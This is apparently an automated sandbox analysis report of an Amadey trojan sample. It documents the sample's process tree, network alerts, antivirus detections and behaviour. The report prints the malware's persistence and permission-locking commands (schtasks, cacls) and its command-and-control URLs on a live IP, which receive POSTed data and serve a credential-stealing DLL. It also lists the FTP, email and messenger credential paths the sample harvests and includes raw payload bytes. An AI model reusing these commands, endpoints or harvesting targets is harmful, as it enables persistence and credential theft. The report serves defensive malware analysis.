Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 14, 2022, 9:36 a.m.	Dec. 14, 2022, 9:49 a.m.

Size	243.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`c6524cc2cb091e23be6d9526d6bcbc99`
SHA256	`37de71b43236c63687b44f238a17cde5f16bea2b2ec8c29b0ea42b62de947d6d`
CRC32	`F7E17847`
ssdeep	`6144:90Tn/MUTehRBZbSjpwe6N+6LzXFuz5a6EKhK6Kr3ZpO:yXg7Zb46FLBuz5aD46zO`
PDB Path	D:\Mktmp\Amadey\Release\Amadey.pdb
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer UPX_Zero - UPX packed file

bibar.exe "C:\Users\test22\AppData\Local\Temp\bibar.exe"
1372
- gntuud.exe "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe"
  2076
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
    2132
  - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "test22:N"&&CACLS "..\2c33368f7d" /P "test22:R" /E&&Exit
    2192
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2268
    - cacls.exe CACLS "gntuud.exe" /P "test22:N"
      2308
    - cacls.exe CACLS "gntuud.exe" /P "test22:R" /E
      2384
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2456
    - cacls.exe CACLS "..\2c33368f7d" /P "test22:N"
      2492
    - cacls.exe CACLS "..\2c33368f7d" /P "test22:R" /E
      2548
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\bf045808586a24\cred64.dll, Main
    2288

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
62.204.41.79	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 62.204.41.79:80 -> 192.168.56.103:49171	2402000	ET DROP Dshield Block Listed Source group 1	Misc Attack
TCP 192.168.56.103:49172 -> 62.204.41.79:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 62.204.41.79:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 62.204.41.79:80 -> 192.168.56.103:49175	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.204.41.79:80 -> 192.168.56.103:49175	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 14, 2022, 9:37 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 14, 2022, 9:36 a.m.	buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2022, 9:36 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Dec. 14, 2022, 9:36 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Dec. 14, 2022, 9:36 a.m.	buffer: r console_handle: 0x00000007	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Mktmp\Amadey\Release\Amadey.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 14, 2022, 9:36 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://62.204.41.79/fb73jc3/index.php?scr=1
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://62.204.41.79/fb73jc3/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.79/fb73jc3/Plugins/cred64.dll

Performs some HTTP requests (3 events)

request	POST http://62.204.41.79/fb73jc3/index.php?scr=1
request	POST http://62.204.41.79/fb73jc3/index.php
request	GET http://62.204.41.79/fb73jc3/Plugins/cred64.dll

Sends data using the HTTP POST Method (2 events)

request	POST http://62.204.41.79/fb73jc3/index.php?scr=1
request	POST http://62.204.41.79/fb73jc3/index.php

Allocates read-write-execute memory (usually to unpack itself) (10 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76971000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74870000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73441000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73431000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73411000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ff1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:37 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73401000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

gntuud.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\bf045808586a24\cred64.dll

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y\|CACLS "..\2c33368f7d" /P "test22:N"&&CACLS "..\2c33368f7d" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Roaming\bf045808586a24\cred64.dll

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Dec. 14, 2022, 9:36 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe	1	1
ShellExecuteExW Dec. 14, 2022, 9:36 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Dec. 14, 2022, 9:36 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y\|CACLS "..\2c33368f7d" /P "test22:N"&&CACLS "..\2c33368f7d" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Dec. 14, 2022, 9:37 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\bf045808586a24\cred64.dll, Main filepath: rundll32.exe	1	1

An executable file was downloaded by the process gntuud.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Dec. 14, 2022, 9:37 a.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à¡Xxª°@@ðOà& àCODE `DATA´° @ÀBSSá Ð´À.idata&à´@À.edataOðÄ@P.relocàÆ@P.rsrc ä@P@ø@P@ StringX@X@¤<@°<@´<@¸<@¬<@$:@@:@\|:@TObjectd@TObjectX@System@ IInterfaceÀFSystemÿÿÌD$øé©KD$øéÇKD$øéÑKÌÌ±@»@Å@ÀFÑ@@L@Ý@L@@¤<@8\@D\@¸<@¬<@T\@@:@\|:@TInterfacedObjectÀÿ%¨áAÀÿ%¤áAÀÿ% áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%\|áAÀÿ%¼áAÀÿ%xáAÀÿ%¸áAÀÿ%táAÀÿ%páAÀÿ%láAÀÿ%háAÀÿ%dáAÀÿ%`áAÀÿ%\áAÀÿ%XáAÀÿ%TáAÀÿ%PáAÀÿ%LáAÀÿ%HáAÀÿ%´áAÀÿ%DáAÀÿ%@áAÀÿ%<áAÀÿ%ÌáAÀÿ%ÈáAÀÿ%ÄáAÀÿ%8áAÀÿ%4áAÀÿ%ÜáAÀÿ%ØáAÀÿ%ÔáAÀÿ%0áAÀÿ%,áAÀÿ%(áAÀÿ%$áAÀSÄ¼» TèYÿÿÿöD$,t·\$0ÃÄD[ÃÀÿ% áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀSÄô»àÕA;uYhDjè¦ÿÿÿD$\|$u3À$ëPD$ÜÕAD$£ÜÕA3ÀÐÒL$TÑT$T$ T$@øduÜD$D$D$$$Ä[Ã@ÃÀSVÄøòØèfÿÿÿD$\|$u3Àë:T$BFT$B$D$$D$X$T$PD$°YZ^[ÃÄøP$T$$L$ T$$JàÕA£àÕAYZÃÀSVWUÄøÙðüBCD$RÊ/M;Èuèÿÿÿ@@CëC;Ðuèqÿÿÿ@CD$;7u®ÓÆèúþÿÿÀu3ÀYZ]_^[Ã@SVWUÄð$ôD$ @;ÈØ>_ùz;ßrv;Èu!BAB)BxuVèðþÿÿëMØ>_ùz;ßu B)Bë3Z\$>.}+û\|$+ÈHT$èMþÿÿÀu3Àë°ë;D$Yÿÿÿ3ÀÄ]_^[ÃSVWÚðþ}¾ëÆÿÿæÿÿsjh Vjè4ýÿÿø;ÿt#Ó¸äÕAèÜýÿÿÀuhjPèýÿÿ3À_^[ÃSVWUÙòèÇCjh hUèáüÿÿø;ÿuÆÿÿæÿÿsjh VUè¼üÿÿ;t#Ó¸äÕAèeýÿÿÀuhjPèüÿÿ3À]_^[ÃSVWUÄèùôÇD$ÿÿÿÿ3ÉL$D$T$T$¡äÕAëkD$X;\$rRÃB;D$wE;\$s\$hh;l$vl$hj@PèüÿÿÀu ÇÀÕAèýÿÿD$¸äÕA;u3À\|$tD$D$+D$GÄ]_^[ÃÀSVWUÄèÙ$t$\|$l$ÐÊáðÿÿL$$ÂÿâðÿÿT$D$D$+D$C¡äÕAë[@@E;D$sD$E;D$vD$E;EsjhE+PPè&ûÿÿÀu3Àë¸äÕA;uÄ]_^[ÃSVWUÄè$t$\|$\$ÐêÅÿåðÿÿl$$âðÿÿT$D$D$+D$A¡äÕAëX@@;D$sD$;D$vD$;s h@+PPèwúÿÿÀu ÇÀÕA¸äÕA;uÄ]_^[ÃÀSVWUÄôÚðü½ôÕAÆÿ?æÀÿÿEëA;p4Ë@ÖèJþÿÿ;t_CBC)BxuGèûÿÿë>;/u»ÓÆèmüÿÿ;t&L$ÓÅèûÿÿ\|$uL$Sè"ýÿÿ3ÀÄ]_^[ÃÀSVWUÄè$úØt$½ôÕAÇÿ?çÀÿÿEë;.t;Xuï;Xu_;x×+P@AL$è5üÿÿ\|$t3L$T$Åèoúÿÿ\|$uL$T$D$èüÿÿ$3ÒéL$×Ãèîûÿÿ\|$t4L$T$Åè(úÿÿ\|$TÿÿÿL$T$D$è4üÿÿ$3ÒëRh;ÝuB;x;$Å×è×üÿÿ$8t.$@B$@)Bxuèùÿÿë$3ÒÄ]_^[ÃSÄèÙÿ?áÀÿÿ$ÐâÀÿÿT$D$;$v_ËT$+$$èýÿÿL$Ó¸ôÕAè]ùÿÿ\$ÛtL$T$ÃènûÿÿD$D$D$D$\|$tT$¸ôÕAè©ùÿÿë3ÀÄ[ÃÀUìQ3ÒUhì@dÿ2d"hÄÕAè¼÷ÿÿ=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖA=ÖAt@¸ÖA3ÉLô@=uìÇEüÖAEüUüPEüUüEü£ÖAÆ¼ÕA3ÀZYYdhó@=EÐAt hÄÕAè!÷ÿÿÃé#ëå ¼ÕAY]ÃUì request_handle: 0x00cc000c	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F

Communicates with host for which no DNS query was performed (1 event)

host

62.204.41.79

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Dec. 14, 2022, 9:36 a.m.	key_handle: 0x00000320 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Harvests information related to installed instant messenger clients (1 event)

file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml

Harvests credentials from local email clients (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "..\2c33368f7d" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y\|CACLS "..\2c33368f7d" /P "test22:N"&&CACLS "..\2c33368f7d" /P "test22:R" /E&&Exit
cmdline	CACLS "gntuud.exe" /P "test22:R" /E
cmdline	cmd /k echo Y\|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y\|CACLS "..\2c33368f7d" /P "test22:N"&&CACLS "..\2c33368f7d" /P "test22:R" /E&&Exit
cmdline	CACLS "..\2c33368f7d" /P "test22:N"
cmdline	CACLS "gntuud.exe" /P "test22:N"

File has been identified by 51 AntiVirus engines on VirusTotal as malicious (50 out of 51 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.Nymaim.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Lazy.158178
FireEye	Generic.mg.c6524cc2cb091e23
ALYac	Gen:Variant.Lazy.158178
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan-Downloader ( 005790d31 )
Alibaba	TrojanDownloader:Win32/Nymaim.f4cd086e
Cybereason	malicious.2cb091
Arcabit	Trojan.Lazy.D269E2
BitDefenderTheta	Gen:NN.ZexaF.36106.puW@aukH0Mii
Cyren	W32/Amadey.A.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.A
TrendMicro-HouseCall	Trojan.Win32.PRIVATELOADER.YXCLNZ
Kaspersky	HEUR:Trojan.Win32.Nymaim.gen
BitDefender	Gen:Variant.Lazy.158178
Cynet	Malicious (score: 100)
Avast	Win32:BotX-gen [Trj]
Tencent	Win32.Trojan.Nymaim.Fdhl
Ad-Aware	Gen:Variant.Lazy.158178
Sophos	Mal/Generic-S + Mal/Horst
DrWeb	Trojan.MulDrop21.25581
VIPRE	Gen:Variant.Lazy.158178
TrendMicro	Trojan.Win32.PRIVATELOADER.YXCLNZ
McAfee-GW-Edition	BehavesLike.Win32.NetLoader.dh
SentinelOne	Static AI - Malicious PE
Emsisoft	Gen:Variant.Lazy.158178 (B)
APEX	Malicious
Webroot	W32.Nymaim
Avira	HEUR/AGEN.1253146
Antiy-AVL	Trojan[Downloader]/Win32.Amadey
Kingsoft	Win32.Troj.Undef.(kcloud)
Gridinsoft	Trojan.Win32.Gen.bot
Microsoft	Trojan:Win32/Woreflint.A!cl
ZoneAlarm	HEUR:Trojan.Win32.Nymaim.gen
GData	Win32.Trojan-Downloader.Amadey.01QQ87
Google	Detected
AhnLab-V3	Malware/Win.Trojanspy.C5238800
Acronis	suspicious
McAfee	Artemis!C6524CC2CB09
MAX	malware (ai score=86)
Malwarebytes	Trojan.Amadey
Rising	Spyware.Agent!8.C6 (TFE:5:UdgJwn0396Q)
Ikarus	Win32.Outbreak
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Injector.EGTS!tr
AVG	Win32:BotX-gen [Trj]

bibar.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All